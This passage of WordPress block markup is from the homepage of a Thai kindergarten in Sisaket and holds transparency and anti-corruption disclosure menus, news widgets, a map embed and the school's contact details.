-->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout 